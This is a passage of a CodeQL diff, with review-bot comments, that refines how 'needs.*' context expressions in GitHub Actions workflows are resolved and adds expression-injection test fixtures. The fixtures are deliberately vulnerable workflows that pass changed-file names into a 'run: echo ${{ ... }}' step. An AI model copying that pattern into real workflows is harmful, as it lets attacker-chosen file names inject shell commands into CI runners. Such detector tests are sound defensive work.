job.getLocation().getFile() + // else + // if this instanceof YamlSequence + // then + // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else none() } } 
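Review bot: The doc comment added above the new `getAMatrixVar()` is a copy of the one on `getMatrixVar(string name)` and says the predicate looks a variable up "by name", which a parameterless predicate does not do; it also repeats the `matric` typo. Suggest `/** Gets any matrix variable (StringLiteral) declared under the `matrix` key of this strategy. */` on the new predicate, and `matrix` instead of `matric` in the existing one. `getAMatrixVariableName()` is deleted without a replacement; the only caller updated in this commit is the Cfg.qll use of `getMatrixVariable`, so if anything outside the diff still calls the removed predicate it will stop compiling — presumably checked, but worth a grep.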
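Review bot: `getANeededJob()` keeps the whole old `if this instanceof YamlString ... else none()` chain as a commented-out block under the one-line `super.getNode(_)` rewrite; dead code like this should be deleted rather than commented out, since git already has it and the comment will drift from the live predicate. None of the fixtures added in this commit uses the scalar form `needs: job1` that the removed `YamlString` branch handled explicitly (inter-job1/2/4/5 all write `needs` as a sequence), so unless the unchanged part of inter-job0.yml does, that shape is now untested by the `getNode(_)` rewrite — a fixture with a bare `needs: job1` would cover it. The enclosing class `Needs` begins in the previous hunk.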
@@ -583,29 +586,30 @@ class StepsExpression extends ContextExpression { * e.g. `${{ needs.job1.outputs.foo}}` */ class NeedsExpression extends ContextExpression { - Job job; - string jobId; + Job neededJob; + string neededJobId; string fieldName; NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and - jobId = expr.regexpCapture(needsCtxRegex(), 1) and + neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and - job.getId() = jobId + neededJob.getId() = neededJobId } - predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } override string getFieldName() { result = fieldName } override AstNode getTarget() { - job.getLocation().getFile() = this.getLocation().getFile() and + neededJob.getLocation().getFile() = this.getLocation().getFile() and + this.getJob().getANeededJob() = neededJob and ( // regular jobs - job.getOutputs() = result + neededJob.getOutputs() = result or // reusable workflow calling jobs - job.getUses() = result + neededJob.getUses() = result ) } } @@ -701,12 +705,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariable(fieldName) = result and + w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariable(fieldName) = result and + j.getStrategy().getMatrixVar(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index d64c91f7bb77..6015e6336ca2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
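Review bot: The new `this.getJob().getANeededJob() = neededJob` conjunct restricts `getTarget()` to jobs the current job actually lists in `needs`, which matches how the `needs.*` context works, but the same scoping is not applied in the characteristic predicate, so `neededJob` still ranges over every job in the database whose id equals `neededJobId`. As a result `usesReusableWorkflow()` appears to hold whenever any same-named job in any workflow file calls a reusable workflow, not only the one this expression refers to. Moving the scoping into the constructor avoids that — `neededJob.getId() = neededJobId and` / `neededJob.getLocation().getFile() = this.getLocation().getFile() and` / `this.getJob().getANeededJob() = neededJob` — after which the two file/needs conjuncts in `getTarget()` become redundant; this assumes `getJob()` is defined for every `NeedsExpression`, which the new `getTarget()` already relies on. The `@@ -701` hunk that follows is only the `getMatrixVar` rename.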
@@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariable(_) and l = child.getLocation() + child = super.getAMatrixVar() and l = child.getLocation() | child order by diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml similarity index 85% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 2760a6c3d35f..5ad00b17db93 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,6 +1,13 @@ -on: push +jn: push jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + job1: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 000000000000..4f149a920419 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml 
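Review bot: The trigger key in the renamed inter-job0.yml changes from `on: push` to `jn: push`, which is not a valid workflow key, so the fixture no longer declares any trigger; the same `jn: push` appears in the new inter-job4.yml and inter-job5.yml. If exercising a workflow without an `on` block is the intent, say so with a comment such as `# no 'on' trigger on purpose: needs.* resolution must not depend on it`; otherwise restore `on: push` in all three files. The Cfg.qll hunk above is only the `getAMatrixVar` rename follow-up.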
@@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 000000000000..21fa789d9e7d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 000000000000..aad2d171c1af --- /dev/null 
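Review bot: inter-job1.yml, inter-job2.yml and inter-job4.yml are identical apart from how `needs` is written (flow sequence `[job0, job1]`, block sequence with both jobs, block sequence with only `job1`), but nothing in the files records what each variant is meant to prove, unlike inter-job5.yml whose sink carries a comment. A one-line header per fixture, e.g. `# needs as a flow sequence [job0, job1]: job1's tainted output must be reported at the sink`, would make the intent explicit and stop the three from being collapsed into one later. The numbering also skips inter-job3.yml, which is harmless but worth a glance in case a fixture was left out of the commit.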
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml new file mode 100644 index 000000000000..d6b7b2b1b0c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -0,0 +1,45 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + + steps: + - id: sink + # Should not be reported since job1 is not needed + run: echo ${{needs.job1.outputs.job_output}} 
diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dacd31cf91c9..9d00212e3af4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... 
iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | 
@@ -75,12 +90,30 @@ nodes
 | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] |
 | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} |
 | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| |
-| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
-| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
-| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source |
-| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
-| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
-| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
 | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} |
 | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} |
 | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' |
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
index b21ac80574bb..1ea054565bc1 100644
--- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
+++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
@@ -15,11 +15,26 @@ edges
 | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] |
 | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| |
 | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] |
-| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} |
-| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] |
-| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} |
-| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} |
-| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] |
+| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} |
+| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] |
+| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} |
+| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} |
+| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] |
+| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} |
+| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] |
+| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} |
+| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} |
+| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] |
+| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} |
+| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] |
+| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} |
+| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} |
+| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] |
+| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} |
+| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] |
+| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} |
+| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} |
+| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] |
 | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' |
 | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' |
 | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' |
@@ -75,12 +90,30 @@ nodes
 | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] |
 | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} |
 | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| |
-| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
-| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
-| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source |
-| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
-| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
-| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
+| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
+| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} |
+| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source |
+| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] |
+| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} |
+| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} |
 | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} |
 | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} |
 | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' |
@@ -176,7 +209,10 @@ subpaths
 | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. |
 | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. |
 | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. |
-| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. |
+| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. |
